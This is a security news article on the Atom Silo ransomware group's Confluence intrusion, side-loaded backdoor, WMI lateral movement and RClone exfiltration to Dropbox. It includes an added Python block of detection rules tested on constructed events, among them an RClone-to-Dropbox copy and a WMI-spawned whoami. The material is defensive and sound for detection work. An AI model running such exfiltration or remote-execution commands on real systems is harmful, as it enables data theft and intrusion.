Using only native Windows tools and avoiding the use of backdoors as services, the group thrived on unpatched, recent vulnerabilities.
A new ransomware group has been detected—one that was first spotted in a sophisticated attack that took place over two days and leveraged a recently revealed vulnerability in Atlassian’s collaboration software.
Researchers named the group Atom Silo and found the ransomware techniques and tools it used to be virtually identical to those of LockFile. The difference lay in the intrusion stage, which involved several novel techniques and complex manoeuvres to evade detection and complete the attack.
For instance, once the operators had gained initial access via a backdoor into the Confluence server, they were able to drop and install a second, stealthy backdoor. This backdoor used an executable from a legitimate third-party software product, one vulnerable to DLL ‘side-load’ attacks, to execute the backdoor code:
- The ransomware payload included a malicious kernel driver designed to disrupt endpoint protection software
- The backdoor connected to a remote command-and-control server over TCP/IP port 80 and allowed for remote execution of Windows shell commands through Windows Management Instrumentation (WMI)
The attackers then moved laterally through the network and compromised further servers, installing additional backdoors through WMI using a compromised administrative account. For the most part, the attackers avoided installing these backdoors as services.
Researchers believe the attackers did this to avoid detection by security controls. The attackers also used remote desktop services to find, copy (using RClone) and exfiltrate data to Dropbox. The ransomware executable was released after exfiltration—at the same time as the release of another file designed to disrupt endpoint protection.
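The behaviours described above (a legitimate executable side-loading a DLL, a backdoor beaconing over port 80 from an unusual location, commands spawned through WMI, and RClone pushing data to Dropbox) can each be expressed as a simple endpoint-telemetry rule. The following Python block is an added example, not code from Sophos or from the original article: it runs a handful of constructed Sysmon-style events through such rules. The event field names, the trusted-directory list and every sample path, host and command line are assumptions made for illustration, not indicators from the incident.

```python
import ntpath
from dataclasses import dataclass
from typing import Callable, Dict, List

# Directories from which DLL loads and outbound connections are considered expected.
# Lowercase, because every comparison below is case-insensitive (assumed list).
TRUSTED_DIRS = (
    "c:\\windows\\",
    "c:\\program files\\",
    "c:\\program files (x86)\\",
)
DROPBOX_SUFFIXES = ("dropbox.com", "dropboxapi.com")


@dataclass
class Event:
    """Minimal Sysmon-style record (IDs: 1 process create, 3 network, 7 image load)."""
    event_id: int
    image: str               # process image (Sysmon 'Image')
    parent_image: str = ""   # ID 1: Sysmon 'ParentImage'
    command_line: str = ""   # ID 1: Sysmon 'CommandLine'
    loaded_image: str = ""   # ID 7: Sysmon 'ImageLoaded' (the DLL)
    signed: str = "true"     # ID 7: Sysmon 'Signed' field, "true"/"false"
    dest_host: str = ""      # ID 3: Sysmon 'DestinationHostname'
    dest_port: int = 0       # ID 3: Sysmon 'DestinationPort'


def _norm(path: str) -> str:
    return path.lower()


def _in_trusted_dir(path: str) -> bool:
    return _norm(path).startswith(TRUSTED_DIRS)


def is_dll_side_load(ev: Event) -> bool:
    """Unsigned DLL loaded from the executable's own directory, outside trusted dirs."""
    if ev.event_id != 7 or ev.signed.lower() != "false":
        return False
    exe_dir = ntpath.dirname(_norm(ev.image))
    dll_dir = ntpath.dirname(_norm(ev.loaded_image))
    return exe_dir == dll_dir and not _in_trusted_dir(ev.loaded_image)


def is_wmi_process_spawn(ev: Event) -> bool:
    """Child of the WMI provider host: how remotely issued WMI commands appear on the endpoint."""
    return ev.event_id == 1 and ntpath.basename(_norm(ev.parent_image)) == "wmiprvse.exe"


def is_rclone_to_dropbox(ev: Event) -> bool:
    """RClone invoked with a Dropbox remote, or connecting to Dropbox API endpoints."""
    if ntpath.basename(_norm(ev.image)) != "rclone.exe":
        return False
    if ev.event_id == 1:
        return "dropbox:" in _norm(ev.command_line)
    if ev.event_id == 3:
        return _norm(ev.dest_host).endswith(DROPBOX_SUFFIXES)
    return False


def is_untrusted_port80_beacon(ev: Event) -> bool:
    """Binary outside trusted dirs talking to TCP/80, the C2 channel described in the write-up."""
    return ev.event_id == 3 and ev.dest_port == 80 and not _in_trusted_dir(ev.image)


RULES: Dict[str, Callable[[Event], bool]] = {
    "dll_side_load": is_dll_side_load,
    "wmi_process_spawn": is_wmi_process_spawn,
    "rclone_to_dropbox": is_rclone_to_dropbox,
    "untrusted_port80_beacon": is_untrusted_port80_beacon,
}


def run_rules(events: List[Event]) -> Dict[str, List[int]]:
    """Return, for each rule, the indices of the events that matched it."""
    hits: Dict[str, List[int]] = {name: [] for name in RULES}
    for idx, ev in enumerate(events):
        for name, rule in RULES.items():
            if rule(ev):
                hits[name].append(idx)
    return hits


# Constructed sample telemetry (not from the incident); every path and host is illustrative.
SAMPLE_EVENTS = [
    Event(1, r"C:\Windows\System32\svchost.exe", parent_image=r"C:\Windows\System32\services.exe"),  # 0 benign
    Event(7, r"C:\Users\Public\tool\vendortool.exe", loaded_image=r"C:\Windows\System32\kernel32.dll"),  # 1 benign
    Event(7, r"C:\Users\Public\tool\vendortool.exe", loaded_image=r"C:\Users\Public\tool\vendorcfg.dll", signed="false"),  # 2 side-load
    Event(3, r"C:\Users\Public\tool\vendortool.exe", dest_host="203.0.113.10", dest_port=80),  # 3 beacon
    Event(1, r"C:\Windows\System32\cmd.exe", parent_image=r"C:\Windows\System32\wbem\WmiPrvSE.exe", command_line="cmd.exe /c whoami"),  # 4 WMI
    Event(1, r"C:\Users\Public\rclone.exe", parent_image=r"C:\Windows\System32\cmd.exe", command_line=r"rclone.exe copy C:\Share dropbox:staging"),  # 5 exfil
    Event(3, r"C:\Users\Public\rclone.exe", dest_host="api.dropboxapi.com", dest_port=443),  # 6 exfil
    Event(3, r"C:\Program Files\Browser\browser.exe", dest_host="example.com", dest_port=80),  # 7 benign
]

if __name__ == "__main__":
    for rule, matched in run_rules(SAMPLE_EVENTS).items():
        print(f"{rule}: {matched}")
```

The side-load rule keys on what the article singles out: a signed, legitimate executable pulling an unsigned DLL from its own, user-writable directory. On a real estate the trusted-directory list and the Dropbox suffixes would come from an allow-list maintained for that environment, and the port-80 rule in particular needs tuning against the organisation's own baseline before it is alerted on.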
According to Sean Gallagher, Senior Threat Researcher, Sophos, the firm that published this research: “This ultra-stealthy adversary was unknown a few weeks ago. Atom Silo has emerged with its own bag of novel and sophisticated tactics, techniques and procedures that were full of twists and turns and challenging to spot, in addition to significant efforts made to evade detection prior to launching the ransomware, which included well-worn techniques used in new ways.”
Gallagher added that, other than the backdoors themselves, the attackers used only native Windows tools and resources to move within the network until they deployed the ransomware: “This incident is also a good reminder of how dangerous publicly disclosed security vulnerabilities in internet-facing software are when left unpatched, even for a relatively short time. In this case, the vulnerability opened the door to two simultaneous, but unrelated attacks from ransomware and an unrelated crypto-miner.”